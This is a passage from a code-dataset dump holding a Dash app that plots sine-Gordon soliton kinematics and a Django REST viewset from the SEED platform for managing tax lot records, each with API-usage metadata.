{"api_name": "yorm.attr", "line_number": 159, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 159, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 160, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 160, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 161, "usage_type": "call"}, {"api_name": "yorm.types.List", "line_number": 172, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 171, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 177, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 177, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 178, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 178, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 179, "usage_type": "call"}, {"api_name": "yorm.types.Boolean", "line_number": 179, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 180, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 181, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 182, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 183, "usage_type": "call"}, {"api_name": "yorm.sync", "line_number": 184, "usage_type": "call"}]}
+{"seq_id": "206611506", "text": "### Show 'snapshot' of field at the boundary\nimport xarray as xr\nimport numpy as np\nfrom numpy import pi\nimport os \n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\n\ndir_path = os.path.dirname(__file__)\nif dir_path:\n dir_path += '/'\narrayFile = dir_path + 'v875Kinematics_k201_t1000_dx025_dt02_eigenvalues.nc'\n\nwith xr.open_dataset(arrayFile, engine='h5netcdf') as eigenvalues:\n from SolitonScattering import SG\n eigenvalues = SG.ScatteringData(eigenvalues)\n typed_kinematics = eigenvalues.typed_kinematics()\n\ngraph = dcc.Graph(\n id='v95Kinematics',\n figure={\n 'data': [{\n 'x': eigenvalues.data['k'].data, \n 'y': typed_kinematics['Kink']['speed'][:,0], \n 'name': 'Kink',\n 'line': {'color':'#1f77b4'},\n },\n {\n 'x': eigenvalues.data['k'].data, \n 'y': typed_kinematics['Antikink']['speed'][:,0], \n 'name': 'Antikink',\n 'line': {'color':'#d62728'},\n },\n {\n 'x': eigenvalues.data['k'].data, \n 'y': typed_kinematics['Breather']['speed'].data, \n 'name': 'Breather Speed',\n 'line': {'color':'#2ca02c'},\n },\n {\n 'x': eigenvalues.data['k'].data, \n 'y': typed_kinematics['Breather']['frequency'].data, \n 'name': 'Breather Frequency',\n 'line': {'color':'black', 'dash':'dash'},\n },\n ],\n 'layout': {\n 'xaxis': {\n 'title':'Defect Parameter, k', \n },\n 'yaxis': {\n 'title':'Speed/Frequency', \n 'range':[0,1],\n },\n 'title': \"Kinematics for v0=0.875\",\n },\n }\n)\n\nif __name__ == '__main__':\n app = dash.Dash()\n server = app.server\n app.layout = html.Div(children=[graph])\n app.run_server(debug=True)\n", "sub_path": "v875Kinematics/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1901, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "xarray.open_dataset", "line_number": 16, "usage_type": "call"}, {"api_name": "SolitonScattering.SG.ScatteringData", "line_number": 18, "usage_type": "call"}, {"api_name": "SolitonScattering.SG", "line_number": 18, "usage_type": "name"}, {"api_name": "dash_core_components.Graph", "line_number": 21, "usage_type": "call"}, {"api_name": "dash.Dash", "line_number": 63, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 65, "usage_type": "call"}]}
+{"seq_id": "41060620", "text": "# !/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n:copyright (c) 2014 - 2017, The Regents of the University of California,\nthrough Lawrence Berkeley National Laboratory (subject to receipt of any\nrequired approvals from the U.S. Department of Energy) and contributors.\nAll rights reserved. # NOQA\n:author\n\"\"\"\n\nimport re\nfrom os import path\n\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.http import JsonResponse\nfrom rest_framework import status\nfrom rest_framework.decorators import detail_route, list_route\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom seed.decorators import ajax_request_class\nfrom seed.lib.superperms.orgs.decorators import has_perm_class\nfrom seed.models import (\n AUDIT_USER_EDIT,\n Column,\n Cycle,\n PropertyView,\n TaxLotAuditLog,\n TaxLotProperty,\n TaxLotState,\n TaxLotView\n)\nfrom seed.serializers.pint import PintJSONEncoder\nfrom seed.serializers.properties import (\n PropertyViewSerializer\n)\nfrom seed.serializers.taxlots import (\n TaxLotSerializer,\n TaxLotStateSerializer,\n TaxLotViewSerializer\n)\nfrom seed.utils.api import api_endpoint_class\nfrom seed.utils.properties import (\n get_changed_fields,\n pair_unpair_property_taxlot,\n update_result_with_master\n)\nfrom seed.utils.time import convert_to_js_timestamp\n\n# Global toggle that controls whether or not to display the raw extra\n# data fields in the columns returned for the view.\nDISPLAY_RAW_EXTRADATA = True\nDISPLAY_RAW_EXTRADATA_TIME = True\n\n\nclass TaxLotViewSet(GenericViewSet):\n renderer_classes = (JSONRenderer,)\n serializer_class = TaxLotSerializer\n\n def _get_filtered_results(self, request, columns):\n page = request.query_params.get('page', 1)\n per_page = request.query_params.get('per_page', 1)\n org_id = request.query_params.get('organization_id', None)\n cycle_id = request.query_params.get('cycle')\n if not org_id:\n return JsonResponse(\n {'status': 'error', 'message': 'Need to pass organization_id as query parameter'},\n status=status.HTTP_400_BAD_REQUEST)\n\n if cycle_id:\n cycle = Cycle.objects.get(organization_id=org_id, pk=cycle_id)\n else:\n cycle = Cycle.objects.filter(organization_id=org_id).order_by('name')\n if cycle:\n cycle = cycle.first()\n else:\n return JsonResponse({\n 'status': 'error',\n 'message': 'Could not locate cycle',\n 'pagination': {\n 'total': 0\n },\n 'cycle_id': None,\n 'results': []\n })\n\n taxlot_views_list = TaxLotView.objects.select_related('taxlot', 'state', 'cycle') \\\n .filter(taxlot__organization_id=request.query_params['organization_id'], cycle=cycle) \\\n .order_by('id')\n\n paginator = Paginator(taxlot_views_list, per_page)\n\n try:\n taxlot_views = paginator.page(page)\n page = int(page)\n except PageNotAnInteger:\n taxlot_views = paginator.page(1)\n page = 1\n except EmptyPage:\n taxlot_views = paginator.page(paginator.num_pages)\n page = paginator.num_pages\n\n response = {\n 'pagination': {\n 'page': page,\n 'start': paginator.page(page).start_index(),\n 'end': paginator.page(page).end_index(),\n 'num_pages': paginator.num_pages,\n 'has_next': paginator.page(page).has_next(),\n 'has_previous': paginator.page(page).has_previous(),\n 'total': paginator.count\n },\n 'cycle_id': cycle.id,\n 'results': TaxLotProperty.get_related(taxlot_views, columns)\n }\n\n return JsonResponse(response, encoder=PintJSONEncoder)\n\n # @require_organization_id\n # @require_organization_membership\n @api_endpoint_class\n @ajax_request_class\n @has_perm_class('requires_viewer')\n def list(self, request):\n \"\"\"\n List all the properties\n ---\n parameters:\n - name: organization_id\n description: The organization_id for this user's organization\n required: true\n paramType: query\n - name: cycle\n description: The ID of the cycle to get taxlots\n required: true\n paramType: query\n - name: page\n description: The current page of taxlots to return\n required: false\n paramType: query\n - name: per_page\n description: The number of items per page to return\n required: false\n paramType: query\n \"\"\"\n return self._get_filtered_results(request, columns=[])\n\n # @require_organization_id\n # @require_organization_membership\n @api_endpoint_class\n @ajax_request_class\n @has_perm_class('requires_viewer')\n @list_route(methods=['POST'])\n def filter(self, request):\n \"\"\"\n List all the properties\n ---\n parameters:\n - name: organization_id\n description: The organization_id for this user's organization\n required: true\n paramType: query\n - name: cycle\n description: The ID of the cycle to get taxlots\n required: true\n paramType: query\n - name: page\n description: The current page of taxlots to return\n required: false\n paramType: query\n - name: per_page\n description: The number of items per page to return\n required: false\n paramType: query\n - name: column filter data\n description: Object containing columns to filter on, should be a JSON object with a single key \"columns\"\n whose value is a list of strings, each representing a column name\n paramType: body\n \"\"\"\n try:\n columns = dict(request.data.iterlists())['columns']\n except AttributeError:\n columns = request.data['columns']\n return self._get_filtered_results(request, columns=columns)\n\n @api_endpoint_class\n @ajax_request_class\n @has_perm_class('can_modify_data')\n @detail_route(methods=['PUT'])\n def pair(self, request, pk=None):\n \"\"\"\n Pair a property to this taxlot\n ---\n parameter_strategy: replace\n parameters:\n - name: organization_id\n description: The organization_id for this user's organization\n required: true\n paramType: query\n - name: property_id\n description: The property id to pair up with this taxlot\n required: true\n paramType: query\n - name: pk\n description: pk (taxlot ID)\n required: true\n paramType: path\n \"\"\"\n # TODO: Call with PUT /api/v2/taxlots/1/pair/?property_id=1&organization_id=1\n organization_id = int(request.query_params.get('organization_id'))\n property_id = int(request.query_params.get('property_id'))\n taxlot_id = int(pk)\n return pair_unpair_property_taxlot(property_id, taxlot_id, organization_id, True)\n\n @api_endpoint_class\n @ajax_request_class\n @has_perm_class('can_modify_data')\n @detail_route(methods=['PUT'])\n def unpair(self, request, pk=None):\n \"\"\"\n Unpair a property from this taxlot\n ---\n parameter_strategy: replace\n parameters:\n - name: organization_id\n description: The organization_id for this user's organization\n required: true\n paramType: query\n - name: property_id\n description: The property id to unpair from this taxlot\n required: true\n paramType: query\n - name: pk\n description: pk (taxlot ID)\n required: true\n paramType: path\n \"\"\"\n # TODO: Call with PUT /api/v2/taxlots/1/unpair/?property_id=1&organization_id=1\n organization_id = int(request.query_params.get('organization_id'))\n property_id = int(request.query_params.get('property_id'))\n taxlot_id = int(pk)\n return pair_unpair_property_taxlot(property_id, taxlot_id, organization_id, False)\n\n # @require_organization_id\n # @require_organization_membership\n @api_endpoint_class\n @ajax_request_class\n @has_perm_class('requires_viewer')\n @list_route(methods=['GET'])\n def columns(self, request):\n \"\"\"\n List all tax lot columns\n ---\n parameters:\n - name: organization_id\n description: The organization_id for this user's organization\n required: true\n paramType: query\n \"\"\"\n organization_id = int(request.query_params.get('organization_id'))\n columns = Column.retrieve_all(organization_id, 'taxlot')\n\n return JsonResponse({'columns': columns})\n\n @api_endpoint_class\n @ajax_request_class\n @has_perm_class('can_modify_data')\n @list_route(methods=['DELETE'])\n def batch_delete(self, request):\n \"\"\"\n Batch delete several tax lots\n ---\n parameters:\n - name: selected\n description: A list of taxlot ids to delete\n many: true\n required: true\n \"\"\"\n taxlot_states = request.data.get('selected', [])\n resp = TaxLotState.objects.filter(pk__in=taxlot_states).delete()\n\n if resp[0] == 0:\n return JsonResponse({'status': 'warning', 'message': 'No action was taken'})\n\n return JsonResponse({'status': 'success', 'taxlots': resp[1]['seed.TaxLotState']})\n\n def _get_taxlot_view(self, taxlot_pk, cycle_pk):\n try:\n taxlot_view = TaxLotView.objects.select_related(\n 'taxlot', 'cycle', 'state'\n ).get(\n taxlot_id=taxlot_pk,\n cycle_id=cycle_pk,\n taxlot__organization_id=self.request.GET['organization_id']\n )\n result = {\n 'status': 'success',\n 'taxlot_view': taxlot_view\n }\n except TaxLotView.DoesNotExist:\n result = {\n 'status': 'error',\n 'message': 'taxlot view with id {} does not exist'.format(\n taxlot_pk)\n }\n except TaxLotView.MultipleObjectsReturned:\n result = {\n 'status': 'error',\n 'message': 'Multiple taxlot views with id {}'.format(\n taxlot_pk)\n }\n return result\n\n @api_endpoint_class\n @ajax_request_class\n @detail_route(methods=['GET'])\n def view(self, request, pk=None):\n \"\"\"\n Get the TaxLot view\n ---\n parameters:\n - name: cycle_id\n description: The cycle ID to query on\n required: true\n paramType: query\n \"\"\"\n cycle_pk = request.query_params.get('cycle_id', None)\n if not cycle_pk:\n return JsonResponse(\n {'status': 'error', 'message': 'Must pass in cycle_id as query parameter'})\n result = self._get_taxlot_view(pk, cycle_pk)\n return JsonResponse(result)\n\n def get_history(self, taxlot_view):\n \"\"\"Return history in reverse order.\"\"\"\n history = []\n\n def record_dict(log):\n filename = None if not log.import_filename else path.basename(log.import_filename)\n if filename:\n # Attempt to remove NamedTemporaryFile suffix\n name, ext = path.splitext(filename)\n pattern = re.compile('(.*?)(_[a-zA-Z0-9]{7})$')\n match = pattern.match(name)\n if match:\n filename = match.groups()[0] + ext\n return {\n 'state': TaxLotStateSerializer(log.state).data,\n 'date_edited': convert_to_js_timestamp(log.created),\n 'source': log.get_record_type_display(),\n 'filename': filename,\n # 'changed_fields': json.loads(log.description) if log.record_type == AUDIT_USER_EDIT else None\n }\n\n log = TaxLotAuditLog.objects.select_related('state', 'parent1', 'parent2').filter(\n state_id=taxlot_view.state_id\n ).order_by('-id').first()\n master = {\n 'state': TaxLotStateSerializer(log.state).data,\n 'date_edited': convert_to_js_timestamp(log.created),\n }\n\n # Traverse parents and add to history\n if log.name in ['Manual Match', 'System Match', 'Merge current state in migration']:\n done_searching = False\n while not done_searching:\n if (log.parent1_id is None and log.parent2_id is None) or log.name == 'Manual Edit':\n done_searching = True\n elif log.name == 'Merge current state in migration':\n record = record_dict(log.parent1)\n history.append(record)\n if log.parent1.name == 'Import Creation':\n done_searching = True\n else:\n tree = log.parent1\n log = tree\n else:\n tree = None\n if log.parent2:\n if log.parent2.name in ['Import Creation', 'Manual Edit']:\n record = record_dict(log.parent2)\n history.append(record)\n elif log.parent2.name == 'System Match' and log.parent2.parent1.name == 'Import Creation' and \\\n log.parent2.parent2.name == 'Import Creation':\n # Handle case where an import file matches within itself, and proceeds to match with\n # existing records\n record = record_dict(log.parent2.parent2)\n history.append(record)\n record = record_dict(log.parent2.parent1)\n history.append(record)\n else:\n tree = log.parent2\n if log.parent1.name in ['Import Creation', 'Manual Edit']:\n record = record_dict(log.parent1)\n history.append(record)\n else:\n tree = log.parent1\n\n if not tree:\n done_searching = True\n else:\n log = tree\n elif log.name == 'Manual Edit':\n record = record_dict(log.parent1)\n history.append(record)\n elif log.name == 'Import Creation':\n record = record_dict(log)\n history.append(record)\n\n return history, master\n\n def _get_properties(self, taxlot_view_pk):\n property_view_pks = TaxLotProperty.objects.filter(\n taxlot_view_id=taxlot_view_pk\n ).values_list('property_view_id', flat=True)\n property_views = PropertyView.objects.filter(\n pk__in=property_view_pks\n ).select_related('cycle', 'state')\n properties = []\n for property_view in property_views:\n properties.append(PropertyViewSerializer(property_view).data)\n return properties\n\n @api_endpoint_class\n @ajax_request_class\n @detail_route(methods=['GET'])\n def properties(self, pk):\n \"\"\"\n Get related properties for this tax lot\n \"\"\"\n return JsonResponse(self._get_properties(pk))\n\n @api_endpoint_class\n @ajax_request_class\n def retrieve(self, request, pk):\n \"\"\"\n Get property details\n ---\n parameters:\n - name: cycle_id\n description: The cycle id for filtering the taxlot view\n required: true\n paramType: query\n - name: organization_id\n description: The organization_id for this user's organization\n required: true\n paramType: query\n \"\"\"\n cycle_pk = request.query_params.get('cycle_id', None)\n if not cycle_pk:\n return JsonResponse(\n {'status': 'error', 'message': 'Must pass in cycle_id as query parameter'})\n result = self._get_taxlot_view(pk, cycle_pk)\n if result.get('status', None) != 'error':\n taxlot_view = result.pop('taxlot_view')\n result.update(TaxLotViewSerializer(taxlot_view).data)\n # remove TaxLotView id from result\n result.pop('id')\n result['state'] = TaxLotStateSerializer(taxlot_view.state).data\n result['properties'] = self._get_properties(taxlot_view.pk)\n result['history'], master = self.get_history(taxlot_view)\n result = update_result_with_master(result, master)\n status_code = status.HTTP_200_OK\n else:\n status_code = status.HTTP_404_NOT_FOUND\n return JsonResponse(result, status=status_code)\n\n @api_endpoint_class\n @ajax_request_class\n def update(self, request, pk):\n \"\"\"\n Update a taxlot\n ---\n parameters:\n - name: cycle_id\n description: The cycle id for filtering the taxlot view\n required: true\n paramType: query\n \"\"\"\n data = request.data\n cycle_pk = request.query_params.get('cycle_id', None)\n if not cycle_pk:\n return JsonResponse(\n {'status': 'error', 'message': 'Must pass in cycle_id as query parameter'})\n result = self._get_taxlot_view(pk, cycle_pk)\n if result.get('status', None) != 'error':\n taxlot_view = result.pop('taxlot_view')\n taxlot_state_data = TaxLotStateSerializer(taxlot_view.state).data\n new_taxlot_state_data = data['state']\n\n changed = True\n for key, val in new_taxlot_state_data.iteritems():\n if val == '':\n new_taxlot_state_data[key] = None\n changed_fields = get_changed_fields(\n taxlot_state_data, new_taxlot_state_data\n )\n if not changed_fields:\n changed = False\n if not changed:\n result.update(\n {'status': 'error', 'message': 'Nothing to update'}\n )\n status_code = 422 # status.HTTP_422_UNPROCESSABLE_ENTITY\n else:\n log = TaxLotAuditLog.objects.select_related().filter(\n state=taxlot_view.state\n ).order_by('-id').first()\n\n if 'extra_data' in new_taxlot_state_data.keys():\n taxlot_state_data['extra_data'].update(new_taxlot_state_data.pop('extra_data'))\n taxlot_state_data.update(new_taxlot_state_data)\n\n if log.name == 'Import Creation':\n # Add new state\n taxlot_state_data.pop('id')\n new_taxlot_state_serializer = TaxLotStateSerializer(\n data=taxlot_state_data\n )\n if new_taxlot_state_serializer.is_valid():\n new_state = new_taxlot_state_serializer.save()\n taxlot_view.state = new_state\n taxlot_view.save()\n\n TaxLotAuditLog.objects.create(organization=log.organization,\n parent1=log,\n parent2=None,\n parent_state1=log.state,\n parent_state2=None,\n state=new_state,\n name='Manual Edit',\n description=None,\n import_filename=log.import_filename,\n record_type=AUDIT_USER_EDIT)\n\n result.update(\n {'state': new_taxlot_state_serializer.validated_data}\n )\n # Removing organization key AND import_file key because they're not JSON-serializable\n # TODO find better solution\n result['state'].pop('organization')\n result['state'].pop('import_file')\n status_code = status.HTTP_201_CREATED\n else:\n result.update(\n {'status': 'error', 'message': 'Invalid Data'}\n )\n status_code = 422 # status.HTTP_422_UNPROCESSABLE_ENTITY\n elif log.name in ['Manual Edit', 'Manual Match', 'System Match',\n 'Merge current state in migration']:\n # Override previous edit state or merge state\n state = taxlot_view.state\n for key, value in new_taxlot_state_data.iteritems():\n setattr(state, key, value)\n state.save()\n\n result.update(\n {'state': TaxLotStateSerializer(state).data}\n )\n # Removing organization key AND import_file key because they're not JSON-serializable\n # TODO find better solution\n result['state'].pop('organization')\n result['state'].pop('import_file')\n\n status_code = status.HTTP_201_CREATED\n else:\n result = {'status': 'error',\n 'message': 'Unrecognized audit log name: ' + log.name}\n status_code = 422\n return JsonResponse(result, status=status_code)\n\n else:\n status_code = status.HTTP_404_NOT_FOUND\n return JsonResponse(result, status=status_code)\n", "sub_path": "seed/views/taxlots.py", "file_name": "taxlots.py", "file_ext": "py", "file_size_in_byte": 22505, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 56, "usage_type": "name"}, {"api_name": "rest_framework.renderers.JSONRenderer", "line_number": 57, "usage_type": "name"}, {"api_name": "seed.serializers.taxlots.TaxLotSerializer", "line_number": 58, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 66, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 68, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 68, "usage_type": "name"}, {"api_name": "seed.models.Cycle.objects.get", "line_number": 71, "usage_type": "call"}, {"api_name": "seed.models.Cycle.objects", "line_number": 71, "usage_type": "attribute"}, {"api_name": "seed.models.Cycle", "line_number": 71, "usage_type": "name"}, {"api_name": "seed.models.Cycle.objects.filter", "line_number": 73, "usage_type": "call"}, {"api_name": "seed.models.Cycle.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "seed.models.Cycle", "line_number": 73, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 77, "usage_type": "call"}, {"api_name": "seed.models.TaxLotView.objects.select_related", "line_number": 87, "usage_type": "call"}, {"api_name": "seed.models.TaxLotView.objects", "line_number": 87, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotView", "line_number": 87, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 91, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 96, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 99, "usage_type": "name"}, {"api_name": "seed.models.TaxLotProperty.get_related", "line_number": 114, "usage_type": "call"}, {"api_name": "seed.models.TaxLotProperty", "line_number": 114, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 117, "usage_type": "call"}, {"api_name": "seed.serializers.pint.PintJSONEncoder", "line_number": 117, "usage_type": "name"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 121, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 122, "usage_type": "name"}, {"api_name": "seed.lib.superperms.orgs.decorators.has_perm_class", "line_number": 123, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 150, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 151, "usage_type": "name"}, {"api_name": "seed.lib.superperms.orgs.decorators.has_perm_class", "line_number": 152, "usage_type": "call"}, {"api_name": "rest_framework.decorators.list_route", "line_number": 153, "usage_type": "call"}, {"api_name": "seed.utils.properties.pair_unpair_property_taxlot", "line_number": 213, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 186, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 187, "usage_type": "name"}, {"api_name": "seed.lib.superperms.orgs.decorators.has_perm_class", "line_number": 188, "usage_type": "call"}, {"api_name": "rest_framework.decorators.detail_route", "line_number": 189, "usage_type": "call"}, {"api_name": "seed.utils.properties.pair_unpair_property_taxlot", "line_number": 242, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 215, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 216, "usage_type": "name"}, {"api_name": "seed.lib.superperms.orgs.decorators.has_perm_class", "line_number": 217, "usage_type": "call"}, {"api_name": "rest_framework.decorators.detail_route", "line_number": 218, "usage_type": "call"}, {"api_name": "seed.models.Column.retrieve_all", "line_number": 261, "usage_type": "call"}, {"api_name": "seed.models.Column", "line_number": 261, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 263, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 246, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 247, "usage_type": "name"}, {"api_name": "seed.lib.superperms.orgs.decorators.has_perm_class", "line_number": 248, "usage_type": "call"}, {"api_name": "rest_framework.decorators.list_route", "line_number": 249, "usage_type": "call"}, {"api_name": "seed.models.TaxLotState.objects.filter", "line_number": 280, "usage_type": "call"}, {"api_name": "seed.models.TaxLotState.objects", "line_number": 280, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotState", "line_number": 280, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 283, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 285, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 265, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 266, "usage_type": "name"}, {"api_name": "seed.lib.superperms.orgs.decorators.has_perm_class", "line_number": 267, "usage_type": "call"}, {"api_name": "rest_framework.decorators.list_route", "line_number": 268, "usage_type": "call"}, {"api_name": "seed.models.TaxLotView.objects.select_related", "line_number": 289, "usage_type": "call"}, {"api_name": "seed.models.TaxLotView.objects", "line_number": 289, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotView", "line_number": 289, "usage_type": "name"}, {"api_name": "seed.models.TaxLotView.DoesNotExist", "line_number": 300, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotView", "line_number": 300, "usage_type": "name"}, {"api_name": "seed.models.TaxLotView.MultipleObjectsReturned", "line_number": 306, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotView", "line_number": 306, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 329, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 332, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 314, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 315, "usage_type": "name"}, {"api_name": "rest_framework.decorators.detail_route", "line_number": 316, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path", "line_number": 339, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 342, "usage_type": "call"}, {"api_name": "os.path", "line_number": 342, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 343, "usage_type": "call"}, {"api_name": "seed.serializers.taxlots.TaxLotStateSerializer", "line_number": 348, "usage_type": "call"}, {"api_name": "seed.utils.time.convert_to_js_timestamp", "line_number": 349, "usage_type": "call"}, {"api_name": "seed.models.TaxLotAuditLog.objects.select_related", "line_number": 355, "usage_type": "call"}, {"api_name": "seed.models.TaxLotAuditLog.objects", "line_number": 355, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotAuditLog", "line_number": 355, "usage_type": "name"}, {"api_name": "seed.serializers.taxlots.TaxLotStateSerializer", "line_number": 359, "usage_type": "call"}, {"api_name": "seed.utils.time.convert_to_js_timestamp", "line_number": 360, "usage_type": "call"}, {"api_name": "seed.models.TaxLotProperty.objects.filter", "line_number": 413, "usage_type": "call"}, {"api_name": "seed.models.TaxLotProperty.objects", "line_number": 413, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotProperty", "line_number": 413, "usage_type": "name"}, {"api_name": "seed.models.PropertyView.objects.filter", "line_number": 416, "usage_type": "call"}, {"api_name": "seed.models.PropertyView.objects", "line_number": 416, "usage_type": "attribute"}, {"api_name": "seed.models.PropertyView", "line_number": 416, "usage_type": "name"}, {"api_name": "seed.serializers.properties.PropertyViewSerializer", "line_number": 421, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 431, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 424, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 425, "usage_type": "name"}, {"api_name": "rest_framework.decorators.detail_route", "line_number": 426, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 451, "usage_type": "call"}, {"api_name": "seed.serializers.taxlots.TaxLotViewSerializer", "line_number": 456, "usage_type": "call"}, {"api_name": "seed.serializers.taxlots.TaxLotStateSerializer", "line_number": 459, "usage_type": "call"}, {"api_name": "seed.utils.properties.update_result_with_master", "line_number": 462, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 463, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 463, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 465, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 465, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 466, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 433, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 434, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 483, "usage_type": "call"}, {"api_name": "seed.serializers.taxlots.TaxLotStateSerializer", "line_number": 488, "usage_type": "call"}, {"api_name": "seed.utils.properties.get_changed_fields", "line_number": 495, "usage_type": "call"}, {"api_name": "seed.models.TaxLotAuditLog.objects.select_related", "line_number": 506, "usage_type": "call"}, {"api_name": "seed.models.TaxLotAuditLog.objects", "line_number": 506, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotAuditLog", "line_number": 506, "usage_type": "name"}, {"api_name": "seed.serializers.taxlots.TaxLotStateSerializer", "line_number": 517, "usage_type": "call"}, {"api_name": "seed.models.TaxLotAuditLog.objects.create", "line_number": 525, "usage_type": "call"}, {"api_name": "seed.models.TaxLotAuditLog.objects", "line_number": 525, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotAuditLog", "line_number": 525, "usage_type": "name"}, {"api_name": "seed.models.AUDIT_USER_EDIT", "line_number": 534, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 543, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 543, "usage_type": "name"}, {"api_name": "seed.serializers.taxlots.TaxLotStateSerializer", "line_number": 558, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 565, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 565, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 570, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 573, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 573, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 574, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 468, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 469, "usage_type": "name"}]}
